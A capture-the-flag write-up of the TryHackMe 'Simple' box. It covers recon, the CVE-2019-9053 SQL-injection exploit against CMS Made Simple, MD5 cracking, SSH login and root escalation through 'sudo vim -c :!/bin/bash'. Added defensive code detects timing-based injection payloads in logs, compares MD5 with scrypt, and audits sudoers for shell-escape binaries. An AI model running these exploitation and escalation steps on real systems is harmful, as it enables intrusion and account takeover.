Platform: TryHackMe | Difficulty: Easy | CVE: CVE-2019-9053
```bash
nmap -p- --open <TARGET_IP>
```

Results:
| Port | Service |
|---|---|
| 21 | FTP |
| 80 | HTTP |
| 2222 | SSH (non-default port) |
Confirm port 2222:

```bash
nmap -p 2222 -sS -sV -A <TARGET_IP>
```

Output confirmed OpenSSH 7.2p2 on port 2222.
Visiting port 80 gave a default Apache page with nothing useful in the source.
Ran Gobuster to find hidden directories:

```bash
gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
```

Found: /simple — a CMS Made Simple installation running version 2.2.8.
Searched for known exploits:

```bash
searchsploit CMS Made Simple 2.2.8
```

Found CVE-2019-9053 — an unauthenticated time-based SQL injection affecting CMS Made Simple <= 2.2.9.
Grabbed the exploit:

```bash
searchsploit -m php/webapps/46635.py
```

The original exploit was Python 2 and had print/encoding issues. Fixed and converted to Python 3.
Ran the fixed exploit against the /simple path:

```bash
python3 46635.py -u http://<TARGET_IP>/simple
```

Extracted:
| Field | Value |
|---|---|
| Salt | 1dac0d92e9fa6bb2 |
| Username | mitch |
| Password hash | 0c01f4468bd75d7a84c7eb73846e8d96 |
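From the blue-team side, a time-based SQLi extraction like this one leaves a very recognisable trail in the web server log: a single source hammering one path with URL-encoded delay primitives (`SLEEP(`, `BENCHMARK(`, `pg_sleep(`, `WAITFOR DELAY`). The following is an added detection example written for this writeup, not code from the box or from the exploit; the Apache combined-format log lines are constructed, and the `id=` parameter in them is a placeholder rather than the parameter CMS Made Simple actually exposes.

```python
import re
import urllib.parse
from collections import Counter

# Constructed Apache "combined"-format lines for the demo (not from the target).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /simple/index.php?page=news HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /simple/index.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.9 - - [10/Mar/2024:12:00:08 +0000] "GET /simple/index.php?id=1%20AND%20BENCHMARK%285000000%2CMD5%281%29%29 HTTP/1.1" 200 512 "-" "python-requests/2.31"
10.0.0.5 - - [10/Mar/2024:12:00:09 +0000] "GET /simple/index.php?page=sleep-hygiene HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:15 +0000] "GET /simple/index.php?id=1%27%20AND%20pg_sleep%285%29-- HTTP/1.1" 200 512 "-" "python-requests/2.31"
"""

# Apache combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Delay primitives across MySQL, MSSQL and PostgreSQL. They are matched on the
# URL-decoded, lower-cased request so %28/%20 encoding cannot hide them; the
# word boundary plus "(" keeps a path like "sleep-hygiene" from matching.
TIMING_INDICATORS = {
    "sleep": re.compile(r"\bsleep\s*\("),
    "benchmark": re.compile(r"\bbenchmark\s*\("),
    "pg_sleep": re.compile(r"\bpg_sleep\s*\("),
    "waitfor_delay": re.compile(r"\bwaitfor\s+delay\b"),
}


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded"] = urllib.parse.unquote_plus(rec["path"]).lower()
    return rec


def timing_indicators(decoded_request):
    """Names of the delay primitives present in a decoded request string."""
    return [name for name, rx in TIMING_INDICATORS.items() if rx.search(decoded_request)]


def scan_log(text):
    """Return one alert per request that carries a time-based SQLi indicator."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = timing_indicators(rec["decoded"])
        if hits:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                           "indicators": hits, "ua": rec["ua"]})
    return alerts


def requests_per_source(alerts):
    """Count flagged requests per source IP; blind extraction needs many of them."""
    return Counter(a["ip"] for a in alerts)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["ip"]} {a["indicators"]} {a["path"]}')
    print("flagged requests per source:", dict(requests_per_source(found)))
```

Keyword matching is only the first layer: the exploit's per-character extraction also shows up as a burst of near-identical requests with response times clustering around the injected delay, so pairing this with `%D` (request duration) in the Apache log format and a per-IP rate threshold catches variants that obfuscate the keyword with comments or case tricks.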
Cracked the MD5 hash using CrackStation:

```text
0c01f4468bd75d7a84c7eb73846e8d96 → secret
```
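Why a lookup service resolves this instantly: the stored value is md5(salt + password), which is the scheme the public exploit's own crack routine checks, and MD5 is cheap enough that a short dictionary covers it in milliseconds. The block below is an added example written for this writeup, not the exploit's code or CMS Made Simple's; it reuses the salt from the table but computes the demo hash itself rather than copying the one above, and it puts a memory-hard scrypt record beside it so the throughput difference is visible on any machine.

```python
import hashlib
import hmac
import os
import time

# Salt taken from the writeup; the demo hash is computed here from the known
# password so the block is self-checking (it is not the hash copied from the box).
DEMO_SALT = "1dac0d92e9fa6bb2"
DEMO_PASSWORD = "secret"


def salted_md5(salt: str, password: str) -> str:
    """md5(salt + password), the scheme the public exploit's crack routine checks."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def verify_salted_md5(salt: str, stored_hash: str, candidate: str) -> bool:
    return hmac.compare_digest(salted_md5(salt, candidate), stored_hash)


def wordlist_check(salt: str, stored_hash: str, wordlist):
    """Offline dictionary check, which is all a lookup service does; returns the match or None."""
    for word in wordlist:
        if verify_salted_md5(salt, stored_hash, word):
            return word
    return None


# Mitigation side: a memory-hard KDF with a random per-user salt.
# n=2**14, r=8 needs 16 MiB per guess, which is what makes bulk guessing expensive.
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1)


def scrypt_record(password: str):
    """Return (salt, digest) the way a password store would keep it."""
    salt = os.urandom(16)
    return salt, hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)


def verify_scrypt(salt: bytes, digest: bytes, candidate: str) -> bool:
    return hmac.compare_digest(
        hashlib.scrypt(candidate.encode(), salt=salt, **SCRYPT_PARAMS), digest
    )


def guesses_per_second(check, seconds: float = 0.25) -> float:
    """Rough throughput of one verifier on this machine, for comparing the two schemes."""
    n, t0 = 0, time.perf_counter()
    while time.perf_counter() - t0 < seconds:
        check("not-the-password")
        n += 1
    return n / seconds


if __name__ == "__main__":
    demo_hash = salted_md5(DEMO_SALT, DEMO_PASSWORD)
    print("dictionary hit:", wordlist_check(DEMO_SALT, demo_hash, ["password", "123456", "secret"]))
    salt, digest = scrypt_record(DEMO_PASSWORD)
    md5_rate = guesses_per_second(lambda c: verify_salted_md5(DEMO_SALT, demo_hash, c))
    scrypt_rate = guesses_per_second(lambda c: verify_scrypt(salt, digest, c))
    print(f"salted md5: ~{md5_rate:,.0f} guesses/s   scrypt: ~{scrypt_rate:,.0f} guesses/s")
```

The salt does its job against precomputed tables only if the hash is slow; with MD5 the attacker simply recomputes the table for that one salt.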
SSH is running on port 2222. Connected with the cracked credentials:

```bash
ssh mitch@<TARGET_IP> -p 2222
```

User flag:

```bash
ls
cat user.txt
```

Checked sudo permissions:

```bash
sudo -l
```

Output showed mitch can run vim as root with no password.
Used GTFOBins vim privesc to read the root flag directly:

```bash
sudo vim /root/root.txt
```

Or to get a root shell:

```bash
sudo vim -c ':!/bin/bash'
```

Root flag captured.
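The root cause on the privesc side is a sudoers rule that hands a shell-capable editor to a user as root, without a password. This added example (written for this writeup, not part of it or of sudo) is a small sudoers audit that flags exactly that pattern over a constructed sudoers file: it parses user specs, carries the `(runas)` list across comma-separated commands the way sudo does, and rates each command by whether it appears on the GTFOBins-style shell-escape list and whether `NOPASSWD`/`NOEXEC` is set. The binary list is an abbreviated, hand-picked subset, not a complete GTFOBins export.

```python
import os
import re

# Binaries that can spawn a shell or read/write arbitrary files once they run
# as root (abbreviated GTFOBins-style set; extend from the real list as needed).
SHELL_ESCAPE = {
    "vim", "vi", "nvim", "nano", "less", "more", "man", "find", "awk",
    "perl", "python", "python3", "bash", "sh", "env", "ftp", "tar",
}

# Constructed sudoers content for the demo, modelled on the box's finding.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed)
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
mitch   ALL=(root) NOPASSWD: /usr/bin/vim
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service
backup  ALL=(root) NOEXEC: /usr/bin/less /var/log/syslog
"""

# user host=specs ; host must not contain "=" so the split lands on the right spot
LINE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?P<specs>.+)$")
# optional (runas), zero or more TAG: markers, then the command with its arguments
SPEC_RE = re.compile(r"^\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudoers(text):
    """Return (user, host, runas, tags, command) for every user-spec command.

    Comment lines, @include/#include directives and Defaults are skipped;
    commands whose arguments contain commas would need a smarter splitter.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#@" or line.startswith("Defaults"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        runas = "root"  # sudo's default when no (runas) list is given
        for spec in m.group("specs").split(","):
            s = SPEC_RE.match(spec)
            if not s:
                continue
            if s.group("runas"):
                runas = s.group("runas")  # a runas list carries over to later specs
            tags = {t.rstrip(":") for t in s.group("tags").split()}
            entries.append((m.group("user"), m.group("host"), runas, tags, s.group("cmd")))
    return entries


def audit_sudoers(text):
    """Flag rules that let a non-root principal reach a root shell."""
    findings = []
    for user, host, runas, tags, cmd in parse_sudoers(text):
        if user == "root":
            continue
        if cmd == "ALL":
            findings.append({"user": user, "cmd": cmd, "severity": "info",
                             "reason": "unrestricted command list"})
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary not in SHELL_ESCAPE:
            continue
        if "NOEXEC" in tags:
            # noexec stops the editor from exec'ing a shell, but it can still
            # open and write root-owned files; sudoedit is the proper fix for edits.
            severity, reason = "medium", f"{binary} allows shell escapes; NOEXEC blocks exec only"
        else:
            severity, reason = "high", f"{binary} can spawn a shell as {runas}"
        if "NOPASSWD" in tags:
            reason += ", no password required"
        findings.append({"user": user, "cmd": cmd, "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f'[{f["severity"]:6}] {f["user"]:8} {f["cmd"]}: {f["reason"]}')
```

For the `mitch` rule the fix is to drop the editor entirely; if the user genuinely needs to edit a root-owned file, `sudoedit /path/to/file` copies the file to a temp location, runs the editor as the invoking user, and copies it back, so `:!` escapes never run as root.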
| Step | Detail |
|---|---|
| Open ports | 21 (FTP), 80 (HTTP), 2222 (SSH) |
| Web discovery | /simple → CMS Made Simple 2.2.8 |
| CVE | CVE-2019-9053 (SQLi) |
| Credentials | mitch : secret |
| Privesc vector | sudo vim → GTFOBins |
- nmap
- gobuster
- searchsploit
- Custom Python 3 exploit (CVE-2019-9053)
- CrackStation (MD5 lookup)
- ssh
- GTFOBins